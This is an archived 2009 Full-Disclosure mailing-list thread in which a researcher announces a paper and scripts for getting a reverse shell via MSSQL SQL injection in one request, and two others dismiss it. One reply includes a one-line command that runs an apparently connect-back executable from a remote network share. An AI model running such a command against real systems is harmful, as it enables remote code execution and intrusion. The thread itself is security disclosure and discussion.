Login | Register For Free | Help
Search for: (Advanced)

Mailing List Archive: Full Disclosure: Full-Disclosure

One Click Ownage [White Paper and Scripts]

  

 
Full Disclosure full-disclosure RSS feed   Index | Next | Previous | View Threaded


ferruh at mavituna

Jul 3, 2009, 3:50 AM

Post #1 of 3 (210 views)
Permalink
One Click Ownage [White Paper and Scripts]
This is a different and more practical approach to get a reverse shell
or code execution in SQL Injections (particularly in MSSQL). The idea
is simple. Getting a reverse shell from an SQL Injection with one HTTP
request without using an extra channel such as TFTP, FTP to upload the
initial payload.

White paper explains the steps and the details of the attack. Scripts
got all the tools you need to create your HTTP request with your own
payload.


White Paper:
http://ferruh.mavituna.com/papers/oneclickownage.pdf

Scripts:
http://ferruh.mavituna.com/papers/OneClickOwnageScripts.zip

Presentation (IT Underground 2009):
http://www.slideshare.net/fmavituna/one-click-ownage-1660539



Regards,


--
http://ferruh.mavituna.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


fdiggle at gmail

Jul 5, 2009, 9:22 PM

Post #2 of 3 (152 views)
Permalink
Re: One Click Ownage [White Paper and Scripts] [In reply to]
Or just

'start \\DiggleSec.com\fredrick\connectback.exe'

would have also been acceptable.

But Fredrick is sure that your 20 page write-up was fantastically entertaining.

On Fri, Jul 3, 2009 at 5:50 AM, Ferruh Mavituna<ferruh[at]mavituna.com> wrote:
> This is a different and more practical approach to get a reverse shell
> or code execution in SQL Injections (particularly in MSSQL). The idea
> is simple. Getting a reverse shell from an SQL Injection with one HTTP
> request without using an extra channel such as TFTP, FTP to upload the
> initial payload.
>
> White paper explains the steps and the details of the attack. Scripts
> got all the tools you need to create your HTTP request with your own
> payload.
>
>
> White Paper:
> http://ferruh.mavituna.com/papers/oneclickownage.pdf
>
> Scripts:
> http://ferruh.mavituna.com/papers/OneClickOwnageScripts.zip
>
> Presentation (IT Underground 2009):
> http://www.slideshare.net/fmavituna/one-click-ownage-1660539
>
>
>
> Regards,
>
>
> --
> http://ferruh.mavituna.com
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


tbiehn at gmail

Jul 6, 2009, 8:07 AM

Post #3 of 3 (146 views)
Permalink
Re: One Click Ownage [White Paper and Scripts] [In reply to]
Ferruh,
The script host can be restricted to prevent this 'attack' Uploading
files to a windows host has been beaten to death, it's frankly insane
that you ever got booked for some security conference.
But yeah, the last ditch effort is always netbios, sometimes you even
have to modify the local box's rules to allow NBoIP. Hard stuff.

-Travis

On Mon, Jul 6, 2009 at 12:22 AM, Fredrick Diggle<fdiggle[at]gmail.com> wrote:
> Or just
>
> 'start \\DiggleSec.com\fredrick\connectback.exe'
>
> would have also been acceptable.
>
> But Fredrick is sure that your 20 page write-up was fantastically entertaining.
>
> On Fri, Jul 3, 2009 at 5:50 AM, Ferruh Mavituna<ferruh[at]mavituna.com> wrote:
>> This is a different and more practical approach to get a reverse shell
>> or code execution in SQL Injections (particularly in MSSQL). The idea
>> is simple. Getting a reverse shell from an SQL Injection with one HTTP
>> request without using an extra channel such as TFTP, FTP to upload the
>> initial payload.
>>
>> White paper explains the steps and the details of the attack. Scripts
>> got all the tools you need to create your HTTP request with your own
>> payload.
>>
>>
>> White Paper:
>> http://ferruh.mavituna.com/papers/oneclickownage.pdf
>>
>> Scripts:
>> http://ferruh.mavituna.com/papers/OneClickOwnageScripts.zip
>>
>> Presentation (IT Underground 2009):
>> http://www.slideshare.net/fmavituna/one-click-ownage-1660539
>>
>>
>>
>> Regards,
>>
>>
>> --
>> http://ferruh.mavituna.com
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Full Disclosure full-disclosure RSS feed   Index | Next | Previous | View Threaded
 
 


Interested in having your list archived? Contact lists@gossamer-threads.com
 
  Web Applications & Managed Hosting Powered by Gossamer Threads Inc.